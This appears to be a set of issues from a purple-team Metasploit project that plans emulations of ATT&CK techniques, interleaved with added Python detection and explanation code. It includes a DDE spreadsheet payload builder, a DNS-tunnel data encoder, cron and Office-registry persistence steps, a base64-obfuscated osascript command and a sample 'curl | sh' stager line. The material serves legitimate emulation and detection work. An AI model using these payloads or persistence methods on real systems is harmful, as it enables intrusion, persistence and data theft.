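DDE_RE = re.compile(r"^[=+\-@]\s*(?P<server>[A-Za-z0-9_.\\:]+)\s*\|(?P<topic>.+?)!(?P<item>\S*)$")


def dde_payload(command: str, server: str = "cmd", item: str = "A0") -> str:
    """Cell text that asks Excel to start `server` with `/c command` over DDE.
    Excel still shows two security prompts before it runs (hence the manual step in the plan)."""
    return f"={server}|'/c {command}'!{item}"


def build_csv(rows) -> str:
    """CSV text; a .csv opened in Excel evaluates formula cells like any workbook."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def find_dde_cells(csv_text: str):
    """(row, col, server, cell) for every cell that parses as a DDE formula."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            m = DDE_RE.match(cell.strip())
            if m:
                hits.append((r, c, m.group("server"), cell))
    return hits


def neutralize_cell(cell: str) -> str:
    """Defensive export: a leading apostrophe makes Excel store the cell as text,
    so formula-looking content (DDE or plain CSV injection) is never evaluated."""
    return "'" + cell if cell[:1] in FORMULA_PREFIXES else cell


if __name__ == "__main__":
    sheet = build_csv([["item", "note"], ["widget", "ok"], ["x", dde_payload("calc")]])
    print(sheet)
    for hit in find_dde_cells(sheet):
        print("DDE cell at row %d col %d launching %s" % hit[:3])
```

The regex keys on the `server|topic!item` shape rather than on the word `cmd`, so `=msexcel|'\..\..\..\Windows\System32\cmd.exe /c calc'!A0` style variants are caught too; a filter that only blocks `=cmd` misses them.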

T1137W - Office Application Startup

Description

Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.

Office Template Macros
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. [1]

Office Visual Basic for Applications (VBA) macros [2] can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. [3] [4]

Word Normal.dotm location: C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm

Excel Personal.xlsb location: C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

Office Test
A Registry location was found that, when a DLL reference is placed within it, causes the DLL pointed to by that binary path to be executed every time an Office application is started. [5]

HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf

Add-ins
Office add-ins can be used to add functionality to Office programs. [6]

Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [7][8]

Outlook Rules, Forms, and Home Page
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.[9]

Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[10]

Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[11]

Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[12]

To abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.[10][11][12]

References

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md

Plan

Initially just implement the registry key change

T1062W - Hypervisor

Description

A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. [1] It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. [2] A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. [3] A malicious hypervisor of this nature could be used to persist on systems through interruption.

Reference

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1062/T1062.md

Plan

Do the PowerShell commands

And clean up after

T1071 - DNS Tunneling

Description

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.

Plan

Do research into http://asintsov.blogspot.com/2017/12/data-exfiltration-in-metasploit.html and identify what infrastructure changes we'll need to make to support this.

https://2017.zeronights.org/wp-content/uploads/materials/ZN17_SintsovAndreyanov_MeterpreterReverseDNS.pdf

While we can do this with something like Cobalt Strike, I'd like to have it as a native capability
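Whatever transport ends up in Metasploit, the upstream side of a DNS channel has to fit data into DNS names, and the RFC 1035 limits (63 octets per label, 253 characters per name) decide how much each query can carry. The following is an added illustration of that encoding, not the Sintsov/Andreyanov reverse-DNS Meterpreter transport and not code from this repo; the domain, chunk numbering scheme and data are constructed.

```python
"""Added example (not from the Praetorian repo or Metasploit): the upstream
half of a DNS tunnel, showing the RFC 1035 size limits that any DNS C2 or
exfil channel has to respect. The domain name and data are constructed."""
import base64

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # practical limit for a full presentation-format name


def _b32(data: bytes) -> str:
    # base32, not base64: DNS names are case-insensitive and resolvers may fold case
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def payload_bytes_per_query(domain: str, seq_width: int = 6) -> int:
    """Largest data chunk whose base32 form fits in one name under `domain`."""
    budget = MAX_NAME - len(domain) - 1 - (seq_width + 1)   # chars left for data labels and dots
    full, rest = divmod(budget, MAX_LABEL + 1)              # each full label costs 63 chars + a dot
    chars = full * MAX_LABEL + max(0, rest - 1)
    return chars * 5 // 8                                    # 8 base32 chars per 5 bytes


def encode_queries(data: bytes, domain: str, seq_width: int = 6):
    """Client side: split `data` into numbered query names <seq>.<b32 labels>.<domain>."""
    n = payload_bytes_per_query(domain, seq_width)
    if n <= 0:
        raise ValueError("domain too long to carry data")
    names = []
    for seq, off in enumerate(range(0, len(data), n)):
        if seq >= 10 ** seq_width:
            raise ValueError("sequence counter exhausted")
        b32 = _b32(data[off:off + n])
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([f"{seq:0{seq_width}d}", *labels, domain])
        assert len(name) <= MAX_NAME and all(len(lb) <= MAX_LABEL for lb in name.split("."))
        names.append(name)
    return names


def decode_queries(names, domain: str) -> bytes:
    """Server side: reassemble in sequence order, tolerating reordered, duplicated
    or unrelated queries (recursive resolvers deliver no ordering guarantee)."""
    suffix = "." + domain.lower()
    chunks = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                      # not for our zone
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0])] = _unb32("".join(labels[1:]))
    return b"".join(chunks[k] for k in sorted(chunks))


if __name__ == "__main__":
    domain = "tun.example.com"
    blob = bytes(range(256)) * 3
    qs = encode_queries(blob, domain)
    print(len(qs), "queries,", payload_bytes_per_query(domain), "bytes each;", qs[0][:40], "...")
    assert decode_queries(qs, domain) == blob
```

The numbers are what a detection engineer should expect from such traffic: with a 15-character zone every query carries at most 141 bytes, so a few hundred kilobytes becomes thousands of near-maximum-length names with high-entropy labels under one domain, which is exactly what DNS tunnel analytics (label length, unique-subdomain count per zone, entropy) key on.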

T1138W - Application Shimming

Description

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. [1] Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses Hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

%WINDIR%\AppPatch\sysmain.sdb
hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb

Custom databases are stored in:

%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom
hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel, and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structured Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevating privileges, installing backdoors, disabling defenses like Windows Defender, etc.

Reference

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1138/T1138.md
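Both the T1137W Office test key above and the two T1138W shim registry locations are things a blue team ends up checking from a registry export rather than live on the box. The block below is an added example (not code from the Praetorian repo or Atomic Red Team): a small parser for regedit `.reg` exports plus the two checks, joining each `AppCompatFlags\Custom\<exe>` entry to its `InstalledSDB\{guid}` record by GUID. The export is constructed; the value names `DatabasePath`, `DatabaseDescription` and `DatabaseType` are what sdbinst.exe writes, and only single-line values are parsed.

```python
"""Added example, not code from the Praetorian repo: parse a regedit (.reg)
export and run two checks this page's TTPs call for: the Office test Perf
key (T1137W) and custom shim databases (T1138W). The export is constructed;
hex blobs that continue over several lines are kept as raw text."""
import re

OFFICE_TEST_PERF = r"HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
SHIM_CUSTOM = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom"
SHIM_INSTALLED = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB"

_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)       # .reg escapes: \\ becomes \ and \" becomes "


def parse_reg(text: str):
    """{key: {value name: data}}, both lower-cased because registry names are case-insensitive."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            reg.setdefault(key, {})
            continue
        m = _VALUE_RE.match(line) if key else None
        if not m:
            continue
        name = "(default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1]).lower()
        data = m.group(2)
        if len(data) >= 2 and data[0] == data[-1] == '"':
            reg[key][name] = _unescape(data[1:-1])        # REG_SZ
        elif data.startswith("dword:"):
            reg[key][name] = int(data[6:], 16)            # REG_DWORD
        else:
            reg[key][name] = data                         # hex(...) blobs kept raw
    return reg


def office_test_perf(reg):
    """T1137W: the key is absent on a clean system; any (Default) value is a DLL Office will load."""
    return reg.get(OFFICE_TEST_PERF.lower(), {}).get("(default)")


def installed_shims(reg):
    """T1138W: join each per-exe Custom subkey to its InstalledSDB record by GUID and flag
    databases stored outside the AppPatch directory, where sdbinst.exe normally copies them."""
    custom, installed = SHIM_CUSTOM.lower() + "\\", SHIM_INSTALLED.lower() + "\\"
    out = []
    for key, values in reg.items():
        if not key.startswith(custom):
            continue
        exe = key[len(custom):]
        for vname in values:
            if not vname.endswith(".sdb"):
                continue
            guid = vname[:-4]
            db = reg.get(installed + guid, {})
            path = db.get("databasepath", "")
            out.append({"exe": exe, "guid": guid, "path": path,
                        "description": db.get("databasedescription", ""),
                        "outside_apppatch": "\\apppatch\\" not in path.lower()})
    return sorted(out, key=lambda s: s["exe"])


# Constructed export: one Office test hit, one shim in the normal location, one planted elsewhere.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf]
@="C:\\Users\\Public\\perf.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\notepad.exe]
"{0c1f2e3d-1111-2222-3333-444455556666}.sdb"=hex(b):00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\legacyapp.exe]
"{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}.sdb"=hex(b):00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{0c1f2e3d-1111-2222-3333-444455556666}]
"DatabasePath"="C:\\Users\\Public\\{0c1f2e3d-1111-2222-3333-444455556666}.sdb"
"DatabaseDescription"="notepad fix"
"DatabaseType"=dword:00010000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}]
"DatabasePath"="C:\\Windows\\AppPatch\\Custom\\{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}.sdb"
"DatabaseDescription"="LegacyApp compatibility"
"DatabaseType"=dword:00010000
"""

if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    print("Office test Perf:", office_test_perf(reg))
    for shim in installed_shims(reg):
        print(shim["exe"], "->", shim["path"], "(outside AppPatch)" if shim["outside_apppatch"] else "")
```

Feed it `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags" shims.reg` and the HKCU Office test key; on a clean workstation `office_test_perf` returns None and `installed_shims` is empty or lists only vendor-described databases under AppPatch.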

T1168M - Local Job Scheduling

Three methods

Method 1

Name      Description                                           Type    Default Value
command   Command to execute                                    string  /tmp/evil.sh
tmp_cron  Temporary reference file to hold evil cron schedule   path    /tmp/persistevil

echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}

Create a sh file that will write t1168m to a file /tmp/t1168m.txt

Method 2

echo "#{command}" > /etc/cron.daily/#{cron_script_name}

Source:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1168/T1168.md
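The entry Method 1 installs, and what it looks like from the other side, as an added example (not code from the Praetorian repo or Atomic Red Team): `cron_line` reproduces the line written to tmp_cron, and `findings` parses `crontab -l` output and flags the traits this TTP leaves behind (every-minute schedule, command in a world-writable directory, download-and-pipe stagers). The crontab text and the 198.51.100.10 address are constructed; Method 2's drop into /etc/cron.daily needs a directory listing rather than crontab parsing and is not covered here.

```python
"""Added example, not code from the Praetorian repo: build the crontab entry
Method 1 above installs, and parse `crontab -l` output to flag entries that
look like that persistence. The crontab text is constructed."""
import re

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def cron_line(command: str, schedule: str = "* * * * *") -> str:
    """The line Method 1 writes to tmp_cron before running `crontab tmp_cron`."""
    return f"{schedule} {command}"


def parse_crontab(text: str):
    """Yield (schedule, command) pairs, skipping comments, blanks and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):                       # @reboot, @daily, ...
            special, _, cmd = line.partition(" ")
            yield special, cmd.strip()
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield " ".join(parts[:5]), parts[5]


def findings(crontab_text: str, user: str = "root"):
    """Entries worth a second look, each with the reasons it was flagged."""
    out = []
    for schedule, cmd in parse_crontab(crontab_text):
        reasons = []
        if schedule.split() == ["*"] * 5:
            reasons.append("runs every minute")
        if any(d in cmd for d in WORLD_WRITABLE):
            reasons.append("executes from a world-writable directory")
        if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
            reasons.append("downloads and pipes to a shell")
        if re.search(r"base64\s+(-d|--decode)\b", cmd):
            reasons.append("decodes an embedded base64 payload")
        if reasons:
            out.append({"user": user, "schedule": schedule, "command": cmd, "reasons": reasons})
    return out


# Constructed `crontab -l` output: two benign jobs, one T1168M-style entry and one stager.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh --quiet
@daily /usr/bin/updatedb
* * * * * /tmp/evil.sh
30 2 * * 1 curl -s http://198.51.100.10/x | sh
"""

if __name__ == "__main__":
    print(cron_line("/tmp/evil.sh"))
    for f in findings(SAMPLE_CRONTAB):
        print(f["schedule"], f["command"], "->", "; ".join(f["reasons"]))
```

Run it over `crontab -l -u <user>` for every login user plus /etc/crontab and /etc/cron.d/* (those two carry an extra user field, so split on six fields there). The every-minute schedule is the loudest signal the default in Method 1 leaves; an emulation that wants to test the host-based sensor rather than the cron schedule itself should also try a less obvious schedule.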

T1006 - Fix file save location

I did not have time to fully dig into this but wanted it tracked to investigate further.

Steps to reproduce

How'd you do it?

Running this module results in the target file being saved to a location within the container that is not accessible from the host file system.

Expected behavior

This file should be saved to a location that is accessible from the local file system either through currently mapped volumes or by mapping a new volume.

Current behavior

Files are saved to /root/.msf4/loot/ within the container but are not accessible in the same or similar location on the local file system.

T1155M - AppleScript

osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('Zj1vcGVuKCIvdG1wL3QxMTU1bS50eHQiLCJ3KyIpCmYud3JpdGUoInQxMTU1bS50eHQiKQpmLmNsb3NlKCk='));\\\" | python &\""

Python code does the following

f=open("/tmp/t1155m.txt","w+")
f.write("t1155m.txt")
f.close()

T1038W

Defense Evasion, Persistence, Privilege Escalation:

Windows systems use a common method to look for required DLLs to load into a program. Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. Adversaries may perform DLL preloading, also called binary planting attacks, by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. Adversaries may use this behavior to cause the program to load a malicious DLL. Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.

Utilize PowerSploit's PowerUp and find dll search order hijacking

https://www.harmj0y.net/blog/powershell/powerup-v1-1-beyond-service-abuse/
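PowerUp's `Find-ProcessDLLHijack` / `Find-PathDLLHijack` answer one question: for a given binary, is there a directory the current user can write to that the loader consults before it reaches the legitimate DLL? The block below is an added model of that decision (not PowerUp's code and not code from this repo) using the default desktop search order; it reports both "plant" (a missing or later-found DLL can be dropped into an earlier writable directory) and "replace" (the legitimate DLL already sits in a writable directory). The binary, directory contents and writable set are constructed, the KnownDLLs set is an illustrative subset, and manifest / .local / SetDllDirectory redirection mentioned above is deliberately outside the model.

```python
"""Added example, not code from the Praetorian repo or from PowerUp: a model
of the Windows DLL search order used to decide which imports of a given
binary could be hijacked by planting or replacing a DLL. Directory layout,
writable directories and import list below are constructed."""

SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]
# Mapped from the \KnownDlls section, so the search order is never consulted (illustrative subset).
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "advapi32.dll"}


def _norm(path: str) -> str:
    return path.rstrip("\\").lower()


def search_order(app_dir, cwd, path_dirs, safe_dll_search_mode=True):
    """Default search order for a bare import / LoadLibrary name (no manifest,
    .local file or SetDllDirectory redirection). SafeDllSearchMode, on by
    default, moves the current directory behind the system directories."""
    if safe_dll_search_mode:
        return [app_dir, *SYSTEM_DIRS, cwd, *path_dirs]
    return [app_dir, cwd, *SYSTEM_DIRS, *path_dirs]


def hijack_candidates(imports, app_dir, cwd, path_dirs, present, writable, safe_dll_search_mode=True):
    """present: {directory: set of DLL names on disk}; writable: directories the user can write to.
    Returns {dll: (directory, "plant" | "replace")} for every import an attacker could
    satisfy before, or instead of, the legitimate copy."""
    ordered = search_order(app_dir, cwd, path_dirs, safe_dll_search_mode)
    display = {_norm(d): d for d in ordered}
    order = [_norm(d) for d in ordered]
    present = {_norm(d): {n.lower() for n in names} for d, names in present.items()}
    writable = {_norm(d) for d in writable}
    found = {}
    for dll in imports:
        name = dll.lower()
        if name in KNOWN_DLLS:
            continue
        for directory in order:
            if name in present.get(directory, ()):
                if directory in writable:               # legit copy lives where we can overwrite it
                    found[dll] = (display[directory], "replace")
                break                                   # the loader stops at the first hit
            if directory in writable:                   # earlier, empty and writable: plant here
                found[dll] = (display[directory], "plant")
                break
    return found


# Constructed scenario: acme.exe imports four DLLs; the user owns Downloads and C:\Tools.
APP_DIR = r"C:\Program Files\Acme"
CWD = r"C:\Users\bob\Downloads"
PATH_DIRS = [r"C:\Windows\System32", r"C:\Tools"]
IMPORTS = ["kernel32.dll", "helper.dll", "version.dll", "missing.dll"]
PRESENT = {
    r"C:\Windows\System32": {"kernel32.dll", "version.dll", "ntdll.dll"},
    APP_DIR: {"helper.dll"},
}
WRITABLE = {CWD, r"C:\Tools"}

if __name__ == "__main__":
    for safe in (True, False):
        print("SafeDllSearchMode", safe, "->",
              hijack_candidates(IMPORTS, APP_DIR, CWD, PATH_DIRS, PRESENT, WRITABLE, safe))
```

Two things the output makes concrete: `missing.dll` (an import that exists nowhere on disk) is hijackable even with SafeDllSearchMode on, because the search falls through to the writable current directory; and `version.dll`, which is safe with the default setting, becomes plantable as soon as SafeDllSearchMode is disabled (HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 0), which is why that value is worth monitoring.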

Fully migrate to GitHub

We're going to be migrating from our internal repository to our public GitHub release. This issue will track migrating internal issues and planning to the public repo.

./docker-compose.local.override different

Hi,

I can see that the latest ./docker-compose.local.override file is different from the one in the GitHub instruction steps. May I know what to do? For example, there are no LHOST and ports in the latest config files.

T1114W - Email Collection

Description

Adversaries may target user email to collect sensitive information from a target.

Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.

Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.

Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.

References

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/Get-Inbox.ps1

https://www.rapid7.com/db/modules/post/windows/gather/enum_files

https://support.office.com/en-ie/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Plan

Also need a way to interact via EWS via passing credentials or current token from session?

reload_all not working, postgres connection fails.

Steps to reproduce

Please guide here:

When i start with: sudo ./docker/bin/msfconsole

Two errors are shown:

  1. Error while running command db_connect: Failed to connect to the Postgres data service: could not translate host name "db" to address: Try again

Call stack:
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:2048:in `db_connect_postgresql'
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:1832:in `cmd_db_connect'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:56:in `load_resource'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:49:in `<main>'

  2. Error while running command reload_all: No classes in Msf::Module::Platform::Linux for ,osx!

Call stack:
/usr/src/metasploit-framework/lib/msf/core/module/platform.rb:61:in `find_platform'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:55:in `block in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in `each'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in `new'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in `from_a'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:30:in `transform'
/usr/src/metasploit-framework/lib/msf/core/module.rb:119:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/module/has_actions.rb:6:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/post_mixin.rb:16:in `initialize'
/usr/src/metasploit-framework/modules/post/multi/purple/t1153.rb:9:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in `new'
/usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in `create'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:61:in `block (3 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in `each'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in `block (2 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in `each'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in `block in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in `synchronize'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in `refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/module_manager/cache.rb:124:in `refresh_cache_from_module_files'
/usr/src/metasploit-framework/lib/msf/core/module_manager/reloading.rb:51:in `reload_modules'
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:859:in `cmd_reload_all'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:57:in `load_resource'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:49:in `<main>'

Expected behavior

Postgres db should connect seamless.
reload_all should work without any errors.

Current behavior

Postgres db is not connected.
reload_all is not working.

System stuff

Metasploit version

Framework: 5.0.69-dev-5e07f93720
Console : 5.0.69-dev-5e07f93720

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

Merge pull request #51 from praetorian-code/tmsteen-create/T1153M

OS

What OS are you running Metasploit on?
Ubuntu 18.04 LTS

T1126W - Network Share Connection Removal

Description

Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. [1]

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
